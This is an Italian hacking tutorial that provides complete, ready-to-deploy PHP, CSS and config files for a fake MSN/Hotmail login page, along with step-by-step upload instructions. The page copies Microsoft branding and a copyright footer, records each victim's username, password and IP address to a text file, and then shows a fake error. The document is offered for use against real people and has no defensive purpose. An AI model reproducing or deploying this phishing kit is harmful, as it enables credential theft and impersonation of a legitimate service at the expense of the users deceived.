(¯`·._.·[°o.OKinG-InFeTO.o°]·._.·´¯)

MSN Password Grabber Whit Fake-Login
**********************************************************
Autore: KinG-LioN
MSN: [email protected]
Info: [email protected]
web: Http://www.eurohackers.it
Origine: http://kinglionweb.altervista.org/tutorial/msn.txt
**********************************************************

Componenti fake-login:

Index.php
Config.php
colori.php
hotmail77x19.gif
msn.gif
Stile.inc
colori.txt
password.txt

#Perch? questo progetto?
Ho deciso di creare questo Password Grabber, che potete riadattare a qualsiasi stile, cambiando le immagine, la parte HTML dell'index.php ed il colore da colori.txt, perche fino ad oggi TUTTI i password Grabber che ho visto in rete, si basano sui cgi-bin, permettendoci di ricevere una E-mail coi dati inseriti dalla Vittima, ad un indirizzo da noi scelto.
Questo sistema, oltre ad essere obsoleto e anche inutile nel 90% dei casi.
Primo perche al giorno d'oggi ? molto difficile riuscire a trovare un servizo gratuito che ci offre la gestione dei cgi-bin.
In secondo luogo, la vittima per inviarci i suoi dati deve inviare una "E-mail muta", quindi risulta indispensabile l'utilizzo da parte di quest'ultima di un client di posta elettronica quale ad esempio Outlook o Incredimail.
In Fine, anche nel caso in cui riuscissimo a trovare un fornitore di cgi-bin gratuito, e la nostra vittima usasse client di posta elettronica, al momento in cui senderebbe i dati, il suo client lo avviserebbe che un messaggio muto sta per essere inviato, chiedendo la conferma dell'invio alla vittima.

#Come nasce questa idea?
Un Giorno vidi in internet un fake-login che si basava su cgi-bin e decisi di provarlo, accorgendomi subito degli errori sopra descritti.
Quindi mi chiesi... Ma ci sar? un modo per non usare la gestione di e-mail per ricevere i dati?
A quesl punto pensai ai numerevoli GuestBook php che non facevano uso di database sql, i quali una volta scritto un messaggio, cliccando sull'apposito pulsante invia, stampava a video i campi immessi dall'utente su una pagina php.
Cosi Ho deciso di creare questo Fake-login basandomi su un GuestBook in php da me creato qualche mese prima.
Naturalmente Gli utenti non verranno mai rediretti sulla pagina nella quale vengono stampati i dati che dovr? rimanere segreta per tutti, tranne che per l'admin, ma verranno rediretti su una pagina di errore personalizzabile.

------------------------------------------[INIZIO FAKE-LOGIN]-----------------------------------------

Iniziare col creare un file da chiamere password.txt all'interno del quale verranno stampate automaticamente le password che riuscirete a racimolare, ed uplodarlo nella folder in cui sono presenti i vari file dello script.
Scaricare le immagini hotmail77x19.gif e msn.gif dai seguenti link's
http://kinglionweb.altervista.org/hotmail77x19.gif
http://kinglionweb.altervista.org/msn.gif ed uplodarle nella folder in cui avrete sharato i vari file.


-------------------------------------------------[index.php]------------------------------------------------------------


<?php
//Script Powered by KinG-LioN - [email protected] - http://www.eurohackers.it
include "colori.php" ;
include "config.php" ;

if(isset($_POST['submit'])){

$email = Strip_Tags($_POST['email']);
$pwd = Strip_Tags($_POST['nick']);
$ip = $_POST['ip'];
$data = date('j/n/y - H:i') ;



$dati_file = "password.txt";

// |

$riga_messaggio = "$pwd|$email|$data|$ip";
$riga_messaggio = str_replace("\n","<BR>",$riga_messaggio);
$riga_messaggio = stripslashes($riga_messaggio);
$riga_messaggio .= "\n";

$fp = fopen($dati_file, "a");
if(!$fp) {
echo "Errore! Non si puo aprire il file delle password";
exit;
}

$fw = fwrite($fp, $riga_messaggio);
$fc = fclose($fp);


echo "<b>Errore di sistema. Riprovare pi? tardi.<br></b>";


}

?>

<html>
<head>
<title>MSN Phishing by KinG-LioN</title>

<?php include "stile.inc" ;?>

<body>
<p></p>
<p></p>
<div align="center">
<p></p>
<p></p>
<p></p>
<p>
<div align="center">
<div align="center">
<h3>&nbsp;</h3>
<h3>Servizio di Gestione password fornito da MSN</h3>
<img border="0" src="hotmail77x19.gif" width="77" height="19"><img src=msn.gif>

<form name="formkinglion" method="post" action="<?php echo $_SERVER['PHP_SELF']; ?> ">
<p></p>
<p></p>
<table>
<tr>
<td><b>Nome Utente:</b></td>
<td><input type="text" name="email" value="[email protected]" size=25></td>
</tr>
<tr>
<td><b>Password:</b></td>
<td><input type="password" name="nick" size=25></td>
</tr>
<tr>
<td></td>
<td></td>
</tr>
<tr>
<td>
<h5></h5>
</td>
<input name="ip" type="hidden" value="<?php echo $_SERVER['REMOTE_ADDR']; ?>">
<td align=right>
<p align="center"><input type="submit" name="submit" value="Accedi" id="bottoni"></p>
</td>
</tr>
</table>
</form>
<h4></a></h4>
</div>
</div>
</p>
</div>
<?php
echo "<div id='copy'> ? 2006 Microsoft Corporation. Tutti i diritti riservati.</div>";
?>
</body>
</html>

-------------------------------------[Fine index.php]------------------------------------------------

Copiare il tutto su NotePad, salvarlo con estensione .php ed uplodare il file.

-------------------------------------------------[colori.php]------------------------------------------------------------

<?php
//Script Powered by KinG-LioN - [email protected] - http://www.eurohackers.it
$datafile = "colori.txt";
if (file_exists($datafile)) {

$apro=fopen($datafile,"r");
$leggo=fread($apro,filesize($datafile));
fclose($apro);
$array_dati=explode("|",$leggo);


$bgcolor= $array_dati[0];
$fontcolor = $array_dati[1];

}


?>

--------------------------------------------[Fine colori.php]----------------------------------------

Copiare il tutto su NotePad, salvarlo con estensione .php ed uplodare il file.


-----------------------------------------------[config.php]---------------------------------------
<?php
// Imposta la tua password e se desideri ricevere una mail quando vengono inseriti i messaggi
//Script Powered by KinG-LioN - [email protected] - http://www.eurohackers.it
$pass= "";
$sendmail= 0; //imposta a 1 se vuoi ricevere la mail
$tuaemail = "[email protected]";

?>

-------------------------------------------[Fine config.php]----------------------------------------


Copiare il tutto su NotePad, salvarlo con estensione .php ed uplodare il file.


----------------------------------------------[colori.txt]-----------------------------------------


#006699|white|4


----------------------------------------------[Fine colori.txt]--------------------------------------

Copiare il tutto su NotePad, salvarlo con estensione .txt ed uplodare il file.



-------------------------------------------------[Stile.inc]------------------------------------------


<?php

echo " <style type='text/css'>";
echo "BODY, TD {";
echo " font-family : Verdana, Arial, sans-serif ;";
echo " font-size : 9pt;";
echo " color:$fontcolor;";
echo " background: $bgcolor ;";
echo "}";



echo " A {FONT-WEIGHT: bold; COLOR:$fontcolor; TEXT-DECORATION: underline}";

echo " A:hover{FONT-WEIGHT: bold;COLOR: #e5e5e5; TEXT-DECORATION: none}";



echo "H2 {";
echo " font-size:18px;";
echo "}";



echo "H3 {";
echo " font-size: 15pt;";
echo " font-style: italic;";
echo " font-family: sans-serif;";
echo "}";


echo "H4 {";
echo " font-family: sans-serif;";
echo " font-size: 10pt;";
echo "}";

echo "HR {";
echo " background-color :$fontcolor;";
echo " border : dotted;";
echo "}";
echo "#bottoni {";
echo " background: $bgcolor ;";
echo " border-left: 2px solid $fontcolor;";
echo " border-right:2px solid Black;";
echo " border-top-color : 2px solid $fontcolor;";
echo " border-bottom-color : 2px solid Black;";
echo " color:$fontcolor;";
echo " padding : 2px;";
echo " font-weight : bold;";

echo "}";
echo "#copy {
font-size : xx-small;
text-align :center;
}";

echo "</style>";
?>


-------------------------------------------------[Fine Stile.inc]-------------------------------------

Copiare il tutto su NotePad, salvarlo con estensione .inc ed uplodare il file.


------------------------------------------------[FINE FAKE-LOGIN]-------------------------------------

#eurohackers.it

Questo sito è pubblicato sotto una Licenza Creative Commons